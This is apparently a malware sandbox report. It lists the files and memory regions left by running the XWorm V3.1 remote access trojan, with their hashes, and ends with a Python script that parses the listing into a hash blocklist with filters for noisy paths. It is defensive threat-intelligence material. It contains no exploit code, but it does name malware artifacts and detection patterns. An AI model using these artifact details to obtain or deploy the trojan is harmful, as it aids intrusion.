C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
| MD5 | 6424805af3b71a828b3134d791979bbd |
| SHA1 | 62368d1bd11c73e236dc3888b14b359b7260af6f |
| SHA256 | 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595 |
| SHA512 | 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30 |
memory/2100-1057-0x0000018B7F140000-0x0000018B7F160000-memory.dmp
memory/2100-1061-0x0000018B7F100000-0x0000018B7F120000-memory.dmp
memory/2100-1063-0x0000018B7F500000-0x0000018B7F520000-memory.dmp
memory/3596-1073-0x000001D576E60000-0x000001D576E80000-memory.dmp
memory/3596-1077-0x000001D576E20000-0x000001D576E40000-memory.dmp
memory/3596-1080-0x000001D577230000-0x000001D577250000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
| MD5 | 6424805af3b71a828b3134d791979bbd |
| SHA1 | 62368d1bd11c73e236dc3888b14b359b7260af6f |
| SHA256 | 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595 |
| SHA512 | 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30 |
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
| MD5 | 6424805af3b71a828b3134d791979bbd |
| SHA1 | 62368d1bd11c73e236dc3888b14b359b7260af6f |
| SHA256 | 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595 |
| SHA512 | 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30 |
memory/772-1091-0x0000017917640000-0x0000017917660000-memory.dmp
memory/772-1094-0x0000017917600000-0x0000017917620000-memory.dmp
memory/772-1098-0x0000017917A90000-0x0000017917AB0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\CAAHQQ1W\microsoft.windows[1].xml
| MD5 | 6424805af3b71a828b3134d791979bbd |
| SHA1 | 62368d1bd11c73e236dc3888b14b359b7260af6f |
| SHA256 | 598e353da6c20a1ed5831bb4f929a414cbaf73d8fefde29ed99819faa35e7595 |
| SHA512 | 784d9494fd7e5c70f5b4f2e8b2b736ab55b94b7df0be741c003ee79875aa50bc9ce1275cc51ac358e9947cdc17c71d794faab152d2ebe4d357dd8aa9d2114a30 |
memory/3568-1112-0x00000181D2CD0000-0x00000181D2CF0000-memory.dmp
memory/3568-1115-0x00000181D2C90000-0x00000181D2CB0000-memory.dmp
memory/3568-1119-0x00000181D32E0000-0x00000181D3300000-memory.dmp
memory/2868-1128-0x000001F15A7F0000-0x000001F15A810000-memory.dmp
memory/2868-1131-0x000001F15A7D0000-0x000001F15A7F0000-memory.dmp
memory/2868-1133-0x000001F15AEA0000-0x000001F15AEC0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 89bd107b6ae509f24169401636ddeb71 |
| SHA1 | 102b5202872a92e68776102690c455aacce4c6c8 |
| SHA256 | 0e58fb88a14c90c802822011ad1b5aedfa98f6620f550430771c767efffa35de |
| SHA512 | 106176e22fdf41dc39dad6106125fc1361fd80eade92675b576e257a73db4739a7088289c74d42cec23ad8923c92283c2b48df0dd53142e8da9457e60c93d923 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fe3277789347345b2b5a992832967648 |
| SHA1 | a65e5ada12bd736908a39cfd9c4a36765075f985 |
| SHA256 | 3fc4daf57ff9c326be75e79a021a0fd7e6def0d7e0726de85b73dc93c6a17e4b |
| SHA512 | fc6ae82b81ec94493660db1c830194a55aadadae8fa15ae069c71429eecbd0542cdc2637723349fe83a414cc923eab772278ab5faafde39b1d2e7dba57a4487d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9c8f5e92ee0d86a7b78b3bc68d8410ed |
| SHA1 | e4454077cfde8c40aca04769902cd11dde9d65ae |
| SHA256 | 2000a064457d4fe88e714d6a743b259cab68eb0d13b022553c2c990dc0c4c255 |
| SHA512 | e9ea8c13cc57ec1ea07574842d8e974bd8fb5262107f0db97c34b89f5a39613651f67488b4d3a1466a39c74d829286e300c81b5c08265528845866601a867283 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 4591abd904703b787033979885577ad9 |
| SHA1 | c530fbd8d3206b3c3c58b62a3cef884c716e4fcf |
| SHA256 | 8fe39a549ab0dcb2dca1b55da912a4014df8e53e89d6dd17a2ecfbaef4eceba9 |
| SHA512 | 6eab0e970abef0bb251c48cdcb946b9477ede42d758aa8e5ca2fe2f170afc9cb25d294e44b21306f5962ec1677063c89a9f7fd83c0e845d75b38d2c9968263e6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 2fd1f68d68bf83f29740885004a42a05 |
| SHA1 | 3545c9b9344ebaf5a654c877c90a09e393c50572 |
| SHA256 | c54dbb07ece2eca5abc361ba973172702524f5cb5de83efca12d0f53a90dd793 |
| SHA512 | b7fc0c49a01244d729debe7a3c3116884d211415c6e4edb9c8979409fbe685a361d698b1cbfe335a4669ab18668dd0c4438d3fabe9f3f477cb1da8477a40cb7a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c5bb579b78ba8fe6319f838055477b99 |
| SHA1 | 4ce57f08d11cec2a343bb39a48d295391f7c9756 |
| SHA256 | 73579b83db32a3ab6c0ee41e6f315902ec3ef5f69250d5bb5a965dd3e43d552b |
| SHA512 | df0cf754c9b54853bbbe1aeb026cb34402b9733a84b94305f373dc9017445bd4d915e99cd25eba1d716d7a04de16d4bcc514225f5683182e2417cb0fce9e8e6f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0c4762344ba28f1b1bd21dfb682728dd |
| SHA1 | 0b0d293d3d0d9bf259a5665ca36463777cd22943 |
| SHA256 | d9f23cead2c721a2e18e9ac4e87efc369b9fb31af7be949ff85162ac9e3563dd |
| SHA512 | 92b02d33b1d8cbcf2c73ac12de43be271a5a71be329f34cad9fca5b04b771d15e060db1616df3cbd22a09cdf95f032c2993c3b492f968f98a2ae8ccda391297e |
C:\Users\Admin\Downloads\XWorm-V3.1-main.zip
| MD5 | c62c2acc11b0b428811596a106b4b515 |
| SHA1 | 5ef29c1bf32ad7c4a3d7400e8d06247e2b920409 |
| SHA256 | ac8caebe03bc2c3c903e6ceaa1020c1d362d4f8524d7c4f18670cba802f4f598 |
| SHA512 | adff2d54a4cc7d9e8b6fad20f001558e5cdf343595dcc504e6be50eadc37b05f4b9fc4bef95808825adf801640997f889b019a5b2b466a644358443a7d5e7a3a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | e3abe84ce15fc3a593519ee367cea5ad |
| SHA1 | e27d540f08164e76a57c27e98f09ad57e2a204a9 |
| SHA256 | e5b997f9d42fd469a9e20712276f94bb7619d04cfc3caf1d63b2836b5f355d0b |
| SHA512 | 41d923643c4685ea7d829fd8f1d9bb1cf23222007f8f0e86c9d573502df8b9041f3c12db736963cceda4ec9f4f45c8cdeaa75b47d864224169d90d86bdb87103 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 873f3c21f43af859fbec88b54e1ccbea |
| SHA1 | b8dadffaad6853f6ea7e602d3f7f559fb13aea45 |
| SHA256 | c0083b86c7900811f6a78b6e017c3a23ee84849e21faf28536899e067ccf7c86 |
| SHA512 | 405357700ba197f0b07c89a4ede7c1d3dec81afa8b8e241785a27c15f258c2f35e7f552a5389483a7f7a7d67f76b07f82e86fe34119fc30b5aed79b9735e8db4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8fbbd014eb3e5395329bc5458c44f5a9 |
| SHA1 | e5874a89e7eca41cc016e5d4f7b835fbf04fef95 |
| SHA256 | aa23908db0c8f1a2ce42fee772a8dea41a3e08a85cbc7c19956cb82d853aca85 |
| SHA512 | f4524ac4d931ede200e6eada1e739d6c1b306db8c08f5011c55c9bccc35095d355beb0eed5a37c366c564198716e4ed3d9e70e53bb7e70a24f96158efe75be57 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 7bffc149c48df51d3ba046ff2f51fc1c |
| SHA1 | dda9ecc508560368eb7a13113048114f0bcbe19b |
| SHA256 | f1c0e289fbd33d9fc0700b36c219c6d2e943318c0e79e4561938f9cb8e83b3eb |
| SHA512 | d77a697449dcafa4ed51fc8106139e30378d836e0eee85cd1dc44947005a8ef0b7f8fed746aa9be0200b5363ba49a82b0704af6f162af4f19f9cb001890ae685 |
C:\Users\Admin\Desktop\New folder\XWorm.V3.1.7z
| MD5 | 809fa0ce52950e65983d16bcc3803900 |
| SHA1 | ad8cb46e4f49ddf05c167ce63bf3e449c3bfe25a |
| SHA256 | 657863a210016af574c75b32f00c012d47c3d96f53734dd5aa1b69d33256283e |
| SHA512 | 3243db58db3f6fd67f58652b112dca78ce1111d57814ca29a62e7dcdecb296a06e0b22a3b08652cb11b49e058bff6914cd8da8877a0c918b7e35988f5f3b23df |
C:\Users\Admin\Desktop\New folder\Icons\icon (15).ico
| MD5 | e3143e8c70427a56dac73a808cba0c79 |
| SHA1 | 63556c7ad9e778d5bd9092f834b5cc751e419d16 |
| SHA256 | b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188 |
| SHA512 | 74e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc |
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe
| MD5 | b7a300c6953f42f199c2ff903feac72f |
| SHA1 | 8f7d38270d33ae7f1b1fa49cd03ecfc63576a8b8 |
| SHA256 | f40b8ef92f828123c81a8b275ab0e29e44b44b3a175e452eea72a475f6cfaf80 |
| SHA512 | 80ef310b54e8c54b80649651acb58c07251bdcf1cde9ead0b85123fee2922e40958a78cc029bb28a69c8ea993952c4cf973b4448b9d24580c535a7460dfbca47 |
C:\Users\Admin\Desktop\New folder\GMap.NET.WindowsForms.dll
| MD5 | 32a8742009ffdfd68b46fe8fd4794386 |
| SHA1 | de18190d77ae094b03d357abfa4a465058cd54e3 |
| SHA256 | 741e1a8f05863856a25d101bd35bf97cba0b637f0c04ecb432c1d85a78ef1365 |
| SHA512 | 22418d5e887a6022abe8a7cbb0b6917a7478d468d211eecd03a95b8fb6452fc59db5178573e25d5d449968ead26bb0b2bfbfada7043c9a7a1796baca5235a82b |
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe
| MD5 | b7a300c6953f42f199c2ff903feac72f |
| SHA1 | 8f7d38270d33ae7f1b1fa49cd03ecfc63576a8b8 |
| SHA256 | f40b8ef92f828123c81a8b275ab0e29e44b44b3a175e452eea72a475f6cfaf80 |
| SHA512 | 80ef310b54e8c54b80649651acb58c07251bdcf1cde9ead0b85123fee2922e40958a78cc029bb28a69c8ea993952c4cf973b4448b9d24580c535a7460dfbca47 |
C:\Users\Admin\Desktop\New folder\XWorm V3.1.exe.config
| MD5 | 66f09a3993dcae94acfe39d45b553f58 |
| SHA1 | 9d09f8e22d464f7021d7f713269b8169aed98682 |
| SHA256 | 7ea08548c23bd7fd7c75ca720ac5a0e8ca94cb51d06cd45ebf5f412e4bbdd7d7 |
| SHA512 | c8ea53ab187a720080bd8d879704e035f7e632afe1ee93e7637fad6bb7e40d33a5fe7e5c3d69134209487d225e72d8d944a43a28dc32922e946023e89abc93ed |
memory/1172-1400-0x00007FFE0E490000-0x00007FFE0EF51000-memory.dmp
memory/1172-1401-0x0000000000C20000-0x0000000001332000-memory.dmp
memory/1172-1403-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
memory/1172-1404-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133340180543279630.txt
| MD5 | 531cc66733871fcd169442abd46a8bd9 |
| SHA1 | 1b6827ae7a22f35340ee56ff42a194a2e2538bf2 |
| SHA256 | a212b2d6bd6f7f8549ca86316262616f9f7fed4fcae3186dd8ba6d2706835402 |
| SHA512 | fb2224b74b5f463d50b0a49a14dd65f9cd865e5988db7a237f9e2b6fd256370d18f8596a862773ef709b54a6d76cc52c36e5c06332e5d8db3bef26427e3257c6 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Explorer
| MD5 | ab0262f72142aab53d5402e6d0cb5d24 |
| SHA1 | eaf95bb31ae1d4c0010f50e789bdc8b8e3116116 |
| SHA256 | 20a108577209b2499cfdba77645477dd0d9771a77d42a53c6315156761efcfbb |
| SHA512 | bf9580f3e5d1102cf758503e18a2cf98c799c4a252eedf9344f7c5626da3a1cf141353f01601a3b549234cc3f2978ad31f928068395b56f9f0885c07dbe81da1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
| MD5 | f4e2076b704d68d14a8dc8962b01fcdd |
| SHA1 | 64f53c8f56907e325bbbfe8bf80d7854830e7e4c |
| SHA256 | 0d258f28b00038ec0bf3d372fcd13d2d898a0599442d14ddfded147b14dae35b |
| SHA512 | 0552b6d8ed646b1efaf804f5f3a996935f778027590254c0ad6f8ef559c61759f0ec4f6ba9c228e01df9409d9b33add5bd7acd7e0e996d898f2bf8e8d8f13672 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Java_jre1_8_0_66_bin_javacpl_exe
| MD5 | 8aaad0f4eb7d3c65f81c6e6b496ba889 |
| SHA1 | 231237a501b9433c292991e4ec200b25c1589050 |
| SHA256 | 813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1 |
| SHA512 | 1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62 |
C:\Users\Admin\Desktop\New folder\GeoIP.dat
| MD5 | 8ef41798df108ce9bd41382c9721b1c9 |
| SHA1 | 1e6227635a12039f4d380531b032bf773f0e6de0 |
| SHA256 | bc07ff22d4ee0b6fafcc12482ecf2981c172a672194c647cedf9b4d215ad9740 |
| SHA512 | 4c62af04d4a141b94eb3e1b0dbf3669cb53fe9b942072ed7bea6a848d87d8994cff5a5f639ab70f424eb79a4b7adabdde4da6d2f02f995bd8d55db23ce99f01b |
memory/1172-1480-0x00007FFE0E490000-0x00007FFE0EF51000-memory.dmp
memory/1172-1481-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
C:\Users\Admin\Desktop\New folder\Intro.wav
| MD5 | dc28d546b643c5a33c292ae32d7cf43b |
| SHA1 | b1f891265914eea6926df765bce0f73f8d9d6741 |
| SHA256 | 20dcc4f50eb47cafda7926735df9ef8241598b83e233066ea495d4b8aa818851 |
| SHA512 | 9d8c1bb61b6f564044aad931e685387df9bc00a92ab5efe7191b94a3d45c7d98a6f71d8ae5668252d6a7b5b44ab6704464d688772aedac8bdb2773d5765d4d56 |
memory/1172-1483-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
memory/1172-1486-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
memory/1172-1487-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
memory/1172-1488-0x000000001C1C0000-0x000000001C1D0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | c1d2e69ee60c15640056c2a862396f21 |
| SHA1 | ec0947cb011f06743e54e39d04745e0e8a40c8af |
| SHA256 | 7d71812a7a79a7fe08129abfb17bd40a84f6122484a48ea9c885b56c98709764 |
| SHA512 | b7b54740fe766db5f060727cd90ca22a968e023932a63c3ad6c767584d1b17f09b56117e28505576f530606bead65511f002babef0be38d7bbd6c211c889bb02 |
C:\Users\Admin\AppData\Local\Temp\Temp1_XWorm-3.1-main.zip\XWorm-3.1-main\LatestRelease.zip
| MD5 | 1f3d3851380d1158329842419d9124a0 |
| SHA1 | e3e7b94632322eb70a54dfe0f7be1d91263831ed |
| SHA256 | 0557f385de60e9114c4eb74d9aa5631b537e42fe576329e6365093b1ea956991 |
| SHA512 | f3d495c117ce672ccb361880c055e5f74c293d55b4f94b87020ab1453fb6d3043c15f417fbc2ff552770d3b8379a7a3062edb496d9d9a69088e245afee2b54a2 |
C:\Users\Admin\Desktop\AtlsWare.exe
| MD5 | a58fc4577a6ad1b5223b74b902ab2a30 |
| SHA1 | ec7aae56284d77242a23d79c6293bfcd43817742 |
| SHA256 | 2ea59dfd6ea0663e384552cfd224bec8ffbd67c6b2dbd815401bd9e835f1b015 |
| SHA512 | b73498e37e9599e340644c05d547c4641b04f09e004a3fa2dc77e641fe4f12259599f21af6365f8cdc8ea863e222dbb8f36fdd652a1350fd3a8b38262dcbe4f5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | a579c89996a91add77f39a954c8c9b2e |
| SHA1 | f1bf99ba89408d30d1f9d3d3f08fed9f37238fca |
| SHA256 | 47b8d8637f4f756482f9eb4b558dff6d7bf481dfdc52d21b8fac7a0129951418 |
| SHA512 | b62cfb413d3e5e3017472ac0d77c2ef3d67c0bd07c30eb288a6aba23752377aa62139ff26be1b1fe558832b375a129ea03974c0e480fe9fb1e0ecad30fbf9e3e |
memory/3048-1764-0x0000023627D90000-0x0000023627D91000-memory.dmp
memory/3048-1766-0x0000023627D90000-0x0000023627D91000-memory.dmp
memory/3048-1765-0x0000023627D90000-0x0000023627D91000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
memory/3048-1769-0x0000023627D90000-0x0000023627D91000-memory.dmp
memory/3048-1768-0x0000023627D90000-0x0000023627D91000-memory.dmp
memory/3048-1770-0x0000023627D90000-0x0000023627D91000-memory.dmp
memory/3048-1771-0x0000023627D90000-0x0000023627D91000-memory.dmp
memory/3048-1773-0x0000023627D90000-0x0000023627D91000-memory.dmp
memory/3048-1772-0x0000023627D90000-0x0000023627D91000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 31bcd8a98d9edaabb6af53e1ce33cb86 |
| SHA1 | c9f11848d4dbe953cab5ade2376f70ab75dc98af |
| SHA256 | db68ef20508fe353f0fde5f144b30a71c164ca7073eee8b58407fa402f910582 |
| SHA512 | b0d11ba7075f3d3d7dedcb632d26eaf41e8218b2fe90ab5a41647fed37eb50aeb1a51982112089e7cbe816c7255e07c443c406d3de4279a51189ac4c8ef1baf6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0098ae1d8a279e0526dcebea4185cd19 |
| SHA1 | fcdbadf940007068b367ef5695e3beeb3fa63d08 |
| SHA256 | b38fb7b311c38debc64f6f523fdafd96252988d7099322f115c3e9cb2802fc59 |
| SHA512 | 6da8ce6d637ae1d0bd23992279484b89200604a47b8e1e8ed79ab2ff643394f68050e18ef83bc9ceb50463ba726fe2b39a377e14433513cd203f288a3cd9dad7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | 3cb3fa05de648422e7042d615d9aafe5 |
| SHA1 | 1785539db34299fe6e214a439388bd255b6b4cf5 |
| SHA256 | 9b87743004f5292301b3a660aadb7bea916bd473b46a62605829b81827e48445 |
| SHA512 | 320a2a074224bb5d6dd0f51234abfeac7b8c4d2bd9ebd7f83917f445feee24ec2f4497f4a9f63184e73533125b14057c509d5b459df7cd9509c2c8500ebb6951 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3ukvlov3.h1w.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe
| MD5 | 17d1a593f7481f4a8cf29fb322d6f472 |
| SHA1 | a24d8e44650268f53ca57451fe564c92c0f2af35 |
| SHA256 | f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c |
| SHA512 | 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849 |
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j41.exe
| MD5 | c4b8578d2354c38613669b1c82a08ccb |
| SHA1 | f6b0353977350e42d6a4f09f887c41b51c1adf6e |
| SHA256 | 3297bc041d9579715b6724204059f5cdc0bcfcbfaa2548b8daaf7ad90e0e82d2 |
| SHA512 | 903d6520c0bd968ca7854bde2edce0c0191592d29050762b00c35c8d25c28304100955cf9ba2956f2c8905f572c7ea67c0b2494622745e82a8a5511146ea9a73 |
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j42.exe
| MD5 | 32b9404c781c7e14e32755a98d93b608 |
| SHA1 | 40803b89f251543a6647feced5f326e00985aa29 |
| SHA256 | 87fa9e84016da0aafdb7f530a093f7f961e2826c6d80c4be25bdbc830c635f97 |
| SHA512 | 79d4c75d058dcce5157bcbb1d527fa341b662a099dc507599e944ec836d06e74609f0551f21407ae3a93bcff1efcc5940d355c0a72289d0c71d7ce98888d932f |
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j43.exe
| MD5 | 27543547fa480422e56e0b4cdbb09488 |
| SHA1 | 35f701bc2c43a308098251d9d413e64e52176fc2 |
| SHA256 | 9664dde8876d8c83375bb227bfebabb53acbbd4920a88acf100ec7ca6c0bc664 |
| SHA512 | a2efa21a27ef67df01578eb4903b8adc852fa682dc168512b4547536d67d801cad0a25af570e0d085f9d4b340a569c964a4cead05e3f8114b5f2b2d659b7a4b2 |
memory/3484-1964-0x0000000002090000-0x0000000002097000-memory.dmp
memory/3484-1965-0x0000000002270000-0x0000000002670000-memory.dmp
memory/3484-1967-0x0000000002270000-0x0000000002670000-memory.dmp
memory/2544-1987-0x00007FFE30470000-0x00007FFE30665000-memory.dmp
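The listing above mixes three kinds of artifact: dropped files with their MD5/SHA1/SHA256/SHA512 rows, environment files the guest OS and browser write on their own (the jump list under `AutomaticDestinations`, the `D3DSCache` lock, Chrome's `Local State` and `Preferences`, PowerShell's `__PSScriptPolicyTest_*.ps1`), and `memory/PID-SEQ-START-END-memory.dmp` region dumps. Before the hashes are pushed into a blocklist it is worth separating the payloads (`AtlsWare.exe`, `Temp\nefeczio.0j4*.exe`) from the per-machine noise. The script below is an added example, not part of this report or of the sandbox's tooling: it parses an excerpt copied verbatim from the listing into records, flags noisy paths with a pattern list that is this example's own assumption, computes the size of each dumped region, and checks candidate file content against the resulting hash index. The sample bytes used for matching are constructed and correspond to no file in the report.

```python
"""Parse a sandbox dropped-file / memory-dump listing into IOC records and
match candidate content against it (added example, not the report's code)."""
import hashlib
import re
from dataclasses import dataclass, field

# Copied verbatim from the listing above: one dropped payload, one browser
# config file, and three memory-dump lines.
REPORT_EXCERPT = r"""
C:\Users\Admin\AppData\Local\Temp\nefeczio.0j40.exe
| MD5 | 17d1a593f7481f4a8cf29fb322d6f472 |
| SHA1 | a24d8e44650268f53ca57451fe564c92c0f2af35 |
| SHA256 | f837127a9ca8fb7baed06ec5a6408484cb129e4e33fa4dc6321097240924078c |
| SHA512 | 8c6617cceb98c0d42abea528419038f3d8ffc9001fc6a95ce8706d587365132b7b905d386a77767f3b6984bbce4fd2f43d9615a6dd695ee70c9fac938f130849 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 31bcd8a98d9edaabb6af53e1ce33cb86 |
| SHA1 | c9f11848d4dbe953cab5ade2376f70ab75dc98af |
| SHA256 | db68ef20508fe353f0fde5f144b30a71c164ca7073eee8b58407fa402f910582 |
| SHA512 | b0d11ba7075f3d3d7dedcb632d26eaf41e8218b2fe90ab5a41647fed37eb50aeb1a51982112089e7cbe816c7255e07c443c406d3de4279a51189ac4c8ef1baf6 |
memory/3048-1764-0x0000023627D90000-0x0000023627D91000-memory.dmp
memory/3484-1965-0x0000000002270000-0x0000000002670000-memory.dmp
memory/2544-1987-0x00007FFE30470000-0x00007FFE30665000-memory.dmp
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Paths the guest OS / browser writes by itself; their hashes differ per
# machine and session, so they are weak indicators. The pattern list is an
# assumption made for this example, not a classification from the report.
NOISE_PATTERNS = [
    re.compile(r"\\AutomaticDestinations\\", re.I),
    re.compile(r"\\D3DSCache\\", re.I),
    re.compile(r"\\Google\\Chrome\\User Data\\", re.I),
    re.compile(r"\\__PSScriptPolicyTest_", re.I),
]


@dataclass
class FileArtifact:
    path: str
    hashes: dict = field(default_factory=dict)  # algo name -> lowercase hex digest

    @property
    def noisy(self) -> bool:
        return any(p.search(self.path) for p in NOISE_PATTERNS)


@dataclass
class MemoryDump:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_report(text: str):
    """Return ([FileArtifact], [MemoryDump]) from the listing format above.

    A line that is neither a hash row nor a memory-dump line starts a new file
    entry; hash rows attach to the most recent file entry and are validated
    against the expected digest length for their algorithm."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_LINE.match(line)
        if m:
            dumps.append(MemoryDump(int(m[1]), int(m[2]), int(m[3], 16), int(m[4], 16)))
            current = None
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m[1], m[2].lower()
            if current is None or len(digest) != HASH_LEN[algo]:
                raise ValueError(f"malformed hash row: {line}")
            current.hashes[algo] = digest
            continue
        current = FileArtifact(path=line)
        files.append(current)
    return files, dumps


def build_index(files, include_noisy: bool = False) -> dict:
    """Map every digest of every artifact to its path, skipping noisy paths by default."""
    index = {}
    for f in files:
        if f.noisy and not include_noisy:
            continue
        for digest in f.hashes.values():
            index[digest] = f.path
    return index


def digests_of(data: bytes) -> dict:
    """Compute the four digests the report uses, keyed by lowercase algorithm name."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256", "sha512")}


def match_bytes(data: bytes, index: dict):
    """Return (algorithm, report path) for the first digest of `data` found in `index`, else None."""
    for algo, digest in digests_of(data).items():
        if digest in index:
            return algo, index[digest]
    return None


if __name__ == "__main__":
    files, dumps = parse_report(REPORT_EXCERPT)
    for f in files:
        print(("noise " if f.noisy else "ioc   ") + f.path, f.hashes.get("SHA256"))
    for d in dumps:
        print(f"pid {d.pid} region {d.start:#x}-{d.end:#x} ({d.size} bytes)")
    print(match_bytes(b"constructed sample content", build_index(files)))
```

Run against the full listing, `build_index` yields the digests worth blocklisting, and the region sizes make it easy to spot the large injected areas (the 4 MiB region in PID 3484 and the ~2 MiB region in PID 2544) among the many one-page dumps from PID 3048.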